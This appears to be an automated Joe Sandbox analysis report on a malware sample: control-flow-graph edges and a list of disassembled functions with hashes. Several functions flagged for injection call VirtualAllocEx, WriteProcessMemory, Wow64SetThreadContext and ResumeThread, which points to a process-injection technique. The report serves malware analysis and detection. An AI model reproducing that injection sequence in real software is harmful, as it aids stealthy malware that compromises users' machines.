64152d2-64152d4 2881->2906 2907 64152bc-64152d0 2881->2907 2896 6415272-6415280 2882->2896 2884->2885 2893 6415119-6415129 2884->2893 2885->2862 2887->2866 2887->2888 2888->2866 2908 641508f-6415094 2888->2908 2904 6415132-6415142 2893->2904 2905 641512b-6415130 2893->2905 2896->2881 2897 64151c9-64151d2 2896->2897 2902 6415491-64154b8 2897->2902 2903 64151d8-64151eb 2897->2903 2916 641554c-641559d 2902->2916 2917 64154be-64154c0 2902->2917 2903->2902 2911 64151f1-6415203 2903->2911 2921 6415144-6415149 2904->2921 2922 641514b-641515b 2904->2922 2905->2862 2909 6415304-6415360 call 6415b88 2906->2909 2910 64152d6-64152de 2906->2910 2907->2906 2908->2818 2953 6415362-6415379 2909->2953 2954 64153a7-64153f4 call 6416727 2909->2954 2918 64152e6-64152e8 2910->2918 2926 6415205-6415211 2911->2926 2927 641526f 2911->2927 2958 64155ad-64155b7 2916->2958 2959 641559f-64155ac 2916->2959 2917->2916 2924 64154c6-64154c8 2917->2924 2918->2909 2925 64152ea-64152fc 2918->2925 2921->2862 2933 6415164-6415169 2922->2933 2934 641515d-6415162 2922->2934 2924->2916 2929 64154ce-64154d2 2924->2929 2925->2909 2926->2902 2931 6415217-641526c 2926->2931 2927->2896 2929->2916 2935 64154d4-64154d8 2929->2935 2931->2927 2933->2862 2934->2862 2938 64154ea-641552c 2935->2938 2939 64154da-64154e8 2935->2939 2947 6415534-6415549 2938->2947 2939->2947 2969 6415387-641539f call 64145d0 2953->2969 2970 641537b-6415385 2953->2970 2980 64153f6-641540f 2954->2980 2981 6415448-641545f 2954->2981 2967 64155c6-64155cc 2958->2967 2968 64155b9-64155c4 2958->2968 2977 64155ce-6415614 2967->2977 2968->2977 2969->2954 2970->2969 2985 6415411 2980->2985 2986 6415419-6415445 2980->2986 2987 6415461-641546a 2981->2987 2988 6415485-641548e 2981->2988 2985->2986 2986->2981 2999 641546d call 641c1a9 2987->2999 3000 641546d call 641bd78 2987->3000 2992 6415473-641547c 2992->2988 2996->2878 2997->2878 2999->2992 3000->2992
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,gq
                                                              • API String ID: 0-3993090981
                                                              • Opcode ID: 0ba3764ce6c5dd279cfc56a35184e872f2604f42d1dcc024fca6284be16e153d
                                                              • Instruction ID: a6eb226cb0563be4c5862ac9723c859fc47df1d1e12006ea299d86cd1acfa78c
                                                              • Opcode Fuzzy Hash: 0ba3764ce6c5dd279cfc56a35184e872f2604f42d1dcc024fca6284be16e153d
                                                              • Instruction Fuzzy Hash: 31625E747006008FD755DF39C894A6ABBE6FF89314B1584AAE506CF3A2DB71EC45CBA0
                                                              Function 0641BD78 Relevance: 1.8, Strings: 1, Instructions: 515COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 3003 641bd78-641bd95 3005 641be85-641be87 3003->3005 3006 641bd9b-641bda5 3003->3006 3007 641be99 3005->3007 3008 641be89-641be97 3005->3008 3011 641bda7-641bdae 3006->3011 3012 641bddb-641bdde 3006->3012 3010 641be9b-641be9d 3007->3010 3008->3010 3013 641bec9-641becb 3010->3013 3014 641be9f-641beae 3010->3014 3015 641bdb4-641bdbc 3011->3015 3016 641c19c-641c1e5 3011->3016 3018 641bde1-641be23 3012->3018 3019 641bedd 3013->3019 3020 641becd-641bedb 3013->3020 3014->3016 3017 641beb4-641bebc 3014->3017 3021 641c103-641c12f 3015->3021 3022 641bdc2-641bdd0 3015->3022 3038 641c1f3-641c202 3016->3038 3039 641c1e7-641c1f1 3016->3039 3176 641bebe call 641c1a9 3017->3176 3177 641bebe call 641bd78 3017->3177 3070 641be25-641be40 3018->3070 3071 641be46-641be80 3018->3071 3023 641bedf-641bee1 3019->3023 3020->3023 3069 641c136-641c162 3021->3069 3022->3021 3037 641bdd6-641bdd9 3022->3037 3027 641bee3-641bef2 3023->3027 3028 641bf0d-641bf0f 3023->3028 3025 641bec4 3033 641c0f9-641c100 3025->3033 3027->3016 3035 641bef8-641bf08 3027->3035 3029 641bf21 3028->3029 3030 641bf11-641bf1f 3028->3030 3036 641bf23-641bf25 3029->3036 3030->3036 3035->3033 3042 641bf41-641bf4d 3036->3042 3043 641bf27-641bf29 3036->3043 3037->3018 3052 641c220-641c24d 3038->3052 3053 641c204-641c210 3038->3053 3039->3038 3042->3016 3048 641bf53-641bf67 3042->3048 3045 641bf3b 3043->3045 3046 641bf2b-641bf39 3043->3046 3051 641bf3d-641bf3f 3045->3051 3046->3051 3048->3033 3051->3042 3056 641bf6c-641bf6e 3051->3056 3099 641c259-641c26d 3052->3099 3100 641c24f-641c256 3052->3100 3064 641c212-641c218 3053->3064 3065 641c21a 3053->3065 3061 641bf80 3056->3061 3062 641bf70-641bf7e 3056->3062 3063 641bf82-641bf84 3061->3063 3062->3063 3067 641bf8a-641bf8c 3063->3067 3068 641c00e-641c010 3063->3068 3064->3052 3065->3052 3073 641bf9a-641bfa7 3067->3073 3074 641bf8e-641bf94 3067->3074 3075 641c022 3068->3075 3076 641c012-641c020 3068->3076 3117 641c169-641c195 3069->3117 3070->3033 3070->3071 3071->3033 3073->3069 3093 641bfad-641bfc4 3073->3093 3077 641bf96 3074->3077 3078 641bf98 3074->3078 3080 641c024-641c026 3075->3080 3076->3080 3077->3073 3078->3073 3084 641c028-641c02a 3080->3084 3085 641c06e-641c070 3080->3085 3091 641c038-641c051 3084->3091 3092 641c02c-641c032 3084->3092 3087 641c082 3085->3087 3088 641c072-641c080 3085->3088 3096 641c084-641c086 3087->3096 3088->3096 3091->3016 3113 641c057-641c069 3091->3113 3097 641c034 3092->3097 3098 641c036 3092->3098 3093->3016 3112 641bfca-641bff3 3093->3112 3101 641c0e5-641c0e7 3096->3101 3102 641c088-641c08a 3096->3102 3097->3091 3098->3091 3178 641c270 call 641c5f7 3099->3178 3179 641c270 call 641c98b 3099->3179 3108 641c0f5-641c0f7 3101->3108 3109 641c0e9-641c0ef 3101->3109 3110 641c098-641c0a7 3102->3110 3111 641c08c-641c092 3102->3111 3108->3033 3108->3117 3115 641c0f1 3109->3115 3116 641c0f3 3109->3116 3110->3016 3120 641c0ad-641c0bc 3110->3120 3118 641c094 3111->3118 3119 641c096 3111->3119 3112->3016 3136 641bff9-641c009 3112->3136 3113->3033 3115->3108 3116->3108 3117->3016 3118->3110 3119->3110 3124 641c0c3-641c0d2 3120->3124 3125 641c0be-641c0c1 3120->3125 3123 641c276-641c278 3127 641c361-641c365 3123->3127 3128 641c27e-641c294 3123->3128 3129 641c0d4-641c0e3 3124->3129 3125->3129 3132 641c367-641c37e 3127->3132 3133 641c3c8-641c3cf 3127->3133 3144 641c33a-641c353 3128->3144 3145 641c29a-641c2b3 3128->3145 3129->3033 3147 641c3a1-641c3ba 3132->3147 3148 641c380-641c39f 3132->3148 3136->3033 3150 641c355 3144->3150 3151 641c35e 3144->3151 3160 641c2b5-641c2c7 3145->3160 3161 641c2e8-641c2f6 3145->3161 3155 641c3c5-641c3d9 3147->3155 3156 641c3bc 3147->3156 3148->3147 3150->3151 3151->3127 3155->3127 3156->3155 3165 641c329-641c334 3160->3165 3166 641c2c9-641c2e4 3160->3166 3161->3165 3167 641c2f8-641c30a 3161->3167 3165->3144 3165->3145 3174 641c2e6 3166->3174 3167->3165 3171 641c30c-641c327 3167->3171 3171->3165 3174->3165 3176->3025 3177->3025 3178->3123 3179->3123
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $cq
                                                              • API String ID: 0-2110363268
                                                              • Opcode ID: 259980fe03f7eda3c83ea4189215ec09a29d7e7e90efd464ee85c943c50be3aa
                                                              • Instruction ID: a9d59b655f687c5e51d1ce5d874263f8bdac5b414e8b265a3bf8ba9538ca18f3
                                                              • Opcode Fuzzy Hash: 259980fe03f7eda3c83ea4189215ec09a29d7e7e90efd464ee85c943c50be3aa
                                                              • Instruction Fuzzy Hash: AA12BF75B40215CFDB658BA4C898B6ABBB2FF88710F14856AD9069F390CB75DC42CBD0
                                                              Function 00F5B8F8 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00F5BB5E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2134011088.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f50000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 6411ffeaa890e38da0a0cedc7687e3e467f404f33152f61a8150c3074846224e
                                                              • Instruction ID: 96b0fa1db4613f451d27a6e2b62501dfabe960240ba853106d6c63c22fb20a8b
                                                              • Opcode Fuzzy Hash: 6411ffeaa890e38da0a0cedc7687e3e467f404f33152f61a8150c3074846224e
                                                              • Instruction Fuzzy Hash: 068169B0A00B058FDB24DF2AD44575ABBF1FF88311F108A2DD98ADBA41D774E949CB91
                                                              Function 064145D0 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $cq
                                                              • API String ID: 0-2110363268
                                                              • Opcode ID: b832d311e4c68b5d485e6f792d039fdf7ed79e43534d8cfe0b5864ab1c070140
                                                              • Instruction ID: 772206882883f23cc0ef40ff71407556fc8d6ddafad02b2ad8dbffd3ddb64285
                                                              • Opcode Fuzzy Hash: b832d311e4c68b5d485e6f792d039fdf7ed79e43534d8cfe0b5864ab1c070140
                                                              • Instruction Fuzzy Hash: ACF15F34B002158FCB55DF69C554AAEB7F6FF88710B15856AE906EB3A5DB30DC02CBA0
                                                              Function 0647AE20 Relevance: 1.7, Strings: 1, Instructions: 403COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Hgq
                                                              • API String ID: 0-2103768809
                                                              • Opcode ID: 115233c34fd4f80c29e5fe38e69300ee1697212eef5122dd55453fa2cdbd524c
                                                              • Instruction ID: 585fb20a0ac1b19e1b7d77c8715a756948e6c593acc412231c5ae9724150a05e
                                                              • Opcode Fuzzy Hash: 115233c34fd4f80c29e5fe38e69300ee1697212eef5122dd55453fa2cdbd524c
                                                              • Instruction Fuzzy Hash: 1DF19271A012189FDB55DFA8D884ADEBBF6FF89310F14805AE815AB351CB31ED85CB90
                                                              Function 064AACF0 Relevance: 1.6, APIs: 1, Instructions: 102injectionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 064AADD0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 003362b9632750d77841f2bf7eb104d8c9214a1f431c2850cdec5c9d3f5b2e4c
                                                              • Instruction ID: 7bc2f03d67bbd31ccdbb3a0f2c79171607f5bf74fb91b3e38c01a85ec9078828
                                                              • Opcode Fuzzy Hash: 003362b9632750d77841f2bf7eb104d8c9214a1f431c2850cdec5c9d3f5b2e4c
                                                              • Instruction Fuzzy Hash: 16316B71A003499FDB51DFA9C845BEEBBF5FF48310F10842AE958A7341DB78A944CBA1
                                                              Function 0647B448 Relevance: 1.6, Strings: 1, Instructions: 347COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Hgq
                                                              • API String ID: 0-2103768809
                                                              • Opcode ID: 55c0cf179215402394e7915fc2c10436ea026353fee95b5a223db9366af36e20
                                                              • Instruction ID: 3db0d3ff317c8eb8ff3b913c7fefd5a192d9abcb60b4d9bf29632feab05cce56
                                                              • Opcode Fuzzy Hash: 55c0cf179215402394e7915fc2c10436ea026353fee95b5a223db9366af36e20
                                                              • Instruction Fuzzy Hash: 60D15A71F002199FDB95DF69C884AAEBBF6EF88300F14846AE505DB391DB34D945CBA0
                                                              Function 00F560A5 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 00F56161
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2134011088.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f50000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: de6b0d735afe1d3d8fc52c178856e794833211390f715f6a90e7075d0c5538d9
                                                              • Instruction ID: 5d2dadac3e3335cf3cead36240e1cd15947c0e8e8ba5ec99f9da174e21f34a35
                                                              • Opcode Fuzzy Hash: de6b0d735afe1d3d8fc52c178856e794833211390f715f6a90e7075d0c5538d9
                                                              • Instruction Fuzzy Hash: EC41DFB0D00719CFDB24CFA9C844B9DBBF2BF49704F20816AD518AB251DB75694ACF90
                                                              Function 00F5450C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 00F56161
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2134011088.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f50000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: dbf406428e039196d62ce5a719d80921dc7c20984ac4d024c916934721836991
                                                              • Instruction ID: 77050061dba23ae0774c58411345e5e87e03adf920afd5062fa185c28262db38
                                                              • Opcode Fuzzy Hash: dbf406428e039196d62ce5a719d80921dc7c20984ac4d024c916934721836991
                                                              • Instruction Fuzzy Hash: 3741E2B0C00719CBDB24DFA9C844B9DFBF5BF49704F60806AD918AB251DB756949CF90
                                                              Function 064AAE30 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 064AAEF8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 58f9439332e19828def8a2d5f8989b8300f7bc7ebb88512fad8b320aaedb663e
                                                              • Instruction ID: 9b997678c37951c43bce0db444e75ef73bf941c24a6420664b8468499c6fef46
                                                              • Opcode Fuzzy Hash: 58f9439332e19828def8a2d5f8989b8300f7bc7ebb88512fad8b320aaedb663e
                                                              • Instruction Fuzzy Hash: 92317C719003499FDB10DFAAD885BEFBBF5FF48310F10842AE918A7241DB759945CBA1
                                                              Function 064AA658 Relevance: 1.6, APIs: 1, Instructions: 92threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 064AA726
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: adaea0348350b6974f3810df5d1090944ade18cde83392b9c719c51133a3a176
                                                              • Instruction ID: e2f728f37a073974542bbb5eccbc95124bff02397bb85372aee131159d71ac25
                                                              • Opcode Fuzzy Hash: adaea0348350b6974f3810df5d1090944ade18cde83392b9c719c51133a3a176
                                                              • Instruction Fuzzy Hash: 6D315C75E003099FDB50DFA9C884BEFBBF5EB98314F14842AD518AB341CB789945CBA1
                                                              Function 064AAB30 Relevance: 1.6, APIs: 1, Instructions: 82memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 064AABEE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 5a6d5b4165a46d6b5fd3656d93c1a44a8d671f2f55395a70fb07cda6375841c6
                                                              • Instruction ID: 9ba111cc1d0b8cbda2474daac4a81cf150e1e2b9a49c549dbca0a71d5a82d8ad
                                                              • Opcode Fuzzy Hash: 5a6d5b4165a46d6b5fd3656d93c1a44a8d671f2f55395a70fb07cda6375841c6
                                                              • Instruction Fuzzy Hash: E8218D359003499FDB11DFA9C944BEFBBF6EF88310F14841AE519A7250C779A944CBA1
                                                              Function 064A47A0 Relevance: 1.6, APIs: 1, Instructions: 78threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: dd4c1cb4d72da158a51c93724d23b375acbc154585773883846581d938040291
                                                              • Instruction ID: 1c6f4c5ddf2b10791cdd29adae70e81d81cf28c1b7f24651eab19f0e1d14fab3
                                                              • Opcode Fuzzy Hash: dd4c1cb4d72da158a51c93724d23b375acbc154585773883846581d938040291
                                                              • Instruction Fuzzy Hash: D621B275E003888FDB50DB6AD84479FBBF5EF89314F14842AD518A7340CB75A844CBA1
                                                              Function 06479C08 Relevance: 1.6, Strings: 1, Instructions: 328COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: &
                                                              • API String ID: 0-1010288
                                                              • Opcode ID: 55fb341201a54f0c0c3d9ca6676a47792c46659097556b378126a4715c365c76
                                                              • Instruction ID: c3dd279868ec80244d5c7e148b9c0177a5cc0cce3291bdd358212124cfd3be59
                                                              • Opcode Fuzzy Hash: 55fb341201a54f0c0c3d9ca6676a47792c46659097556b378126a4715c365c76
                                                              • Instruction Fuzzy Hash: D7C1AC757006129FDB999F35869047A7BE3BFC4210345896AE85BCB382DF34EC06CBA1
                                                              Function 064A8CF4 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WaitForInputIdle.USER32(00000000), ref: 064A8D80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: IdleInputWait
                                                              • String ID:
                                                              • API String ID: 2200289081-0
                                                              • Opcode ID: b3762400bc3ea3b8217693e760126ee3ea13f0dd02ec53af00837846ffb001f5
                                                              • Instruction ID: 6e5209d043d34277cc76ed463a32c0a7f5acfacec015ab7b3d239313433fc109
                                                              • Opcode Fuzzy Hash: b3762400bc3ea3b8217693e760126ee3ea13f0dd02ec53af00837846ffb001f5
                                                              • Instruction Fuzzy Hash: 482124B4D00248AFDB64CFAAD984B9EBFF5EF58304F24805AE408A7340CB719805CFA1
                                                              Function 064A8D00 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WaitForInputIdle.USER32(00000000), ref: 064A8D80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: IdleInputWait
                                                              • String ID:
                                                              • API String ID: 2200289081-0
                                                              • Opcode ID: 1fa7f8472c72a44e275952da9dd51614f7cd5791bc40e6ea9fa42b7889a033e2
                                                              • Instruction ID: fe3c9f411db1058fa3140d12e339e2d8363be0724b7eb13760b6cc44ec6c4076
                                                              • Opcode Fuzzy Hash: 1fa7f8472c72a44e275952da9dd51614f7cd5791bc40e6ea9fa42b7889a033e2
                                                              • Instruction Fuzzy Hash: 5421F6B0D10258AFCB54CFA9D584B9EBFF5EF58304F24805AE418A7350CB749805CFA1
                                                              Function 00F5E1F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F5E277
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2134011088.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f50000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: c7d3ca96bbcf287a7d94d3f9b0ffd54307d7495937e0a08a39f9376104376c81
                                                              • Instruction ID: 81377fa4ec4bc92d89add5d9c40c87bd0fe5c32c1c9645793593e07d93700532
                                                              • Opcode Fuzzy Hash: c7d3ca96bbcf287a7d94d3f9b0ffd54307d7495937e0a08a39f9376104376c81
                                                              • Instruction Fuzzy Hash: E221B0B5D002499FDB10CFAAD984ADEBBF9EB48320F14841AE918A3250D374A954DFA5
                                                              Function 00F5ACA8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00F5BBD9,00000800,00000000,00000000), ref: 00F5BDEA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2134011088.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f50000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 59e364ad873649a66a8a836ab36ab8f0279458ff57b128798ca69dae66be1f93
                                                              • Instruction ID: 0a161fa0abd8d211ade2dff1836c37d04609261eb7c62f259d3b9ea201cbf0bc
                                                              • Opcode Fuzzy Hash: 59e364ad873649a66a8a836ab36ab8f0279458ff57b128798ca69dae66be1f93
                                                              • Instruction Fuzzy Hash: D31103B6C002499FDB10CF9AD844A9EFBF4EB88320F14842EE919A7200C375A945CFA5
                                                              Function 00F5BD78 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00F5BBD9,00000800,00000000,00000000), ref: 00F5BDEA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2134011088.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f50000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: f84c5957c77ed8c835a2c2d51c5a38d1ff2f742d41a5c76db81921ff67b64f64
                                                              • Instruction ID: 4c9e499cde1e045ef9aad88863ef18f65c95b489feae59bc39e31ba35bcd0ef8
                                                              • Opcode Fuzzy Hash: f84c5957c77ed8c835a2c2d51c5a38d1ff2f742d41a5c76db81921ff67b64f64
                                                              • Instruction Fuzzy Hash: EB11F6B6D003499FDB10CF9AD884ADEFBF4EB88720F14842ED919A7200C775A945CFA5
                                                              Function 00F5BAF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00F5BB5E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2134011088.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f50000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: e6456d9a2151674305a4e4784b960606e84003503dd1e72b62a749682f37d96b
                                                              • Instruction ID: aa20c77877b4eac3ca90018886d6debf5828683c2a9b83700821e79a95335c22
                                                              • Opcode Fuzzy Hash: e6456d9a2151674305a4e4784b960606e84003503dd1e72b62a749682f37d96b
                                                              • Instruction Fuzzy Hash: 0A1110B6C003498FCB10CF9AC844BDEFBF4EB88324F10841AD918A7210C3B5A949CFA5
                                                              Function 0641C5F7 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,gq
                                                              • API String ID: 0-3993090981
                                                              • Opcode ID: a055557459e4ed7d8a084b1f1040d142a4f5107b515fd291f691c7346c37f277
                                                              • Instruction ID: bc37d5264df334ff79509a120dec3fd9f1e5aba517566d71c6e8a661c15ff16b
                                                              • Opcode Fuzzy Hash: a055557459e4ed7d8a084b1f1040d142a4f5107b515fd291f691c7346c37f277
                                                              • Instruction Fuzzy Hash: BDA17030A002099FDB55DFA5C994AAEBBB2FF85700B10851AD906DF3A5DF74ED06CB90
                                                              Function 0641F038 Relevance: 1.5, Strings: 1, Instructions: 253COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $cq
                                                              • API String ID: 0-2110363268
                                                              • Opcode ID: 0c60ea4549a9d846aa805df6e4fd920ec50347e7b24d010683ef1eb34d75f759
                                                              • Instruction ID: 7e5377f150ffdeba1441a5e6510d19a6c27e6c6e5ace202c156e589ba1f2a30e
                                                              • Opcode Fuzzy Hash: 0c60ea4549a9d846aa805df6e4fd920ec50347e7b24d010683ef1eb34d75f759
                                                              • Instruction Fuzzy Hash: 9DA17D74A102058FDB95DFA8D454AAE7BF2EF88300F14805AE906DF392CB75DD46CBA0
                                                              Function 06473518 Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
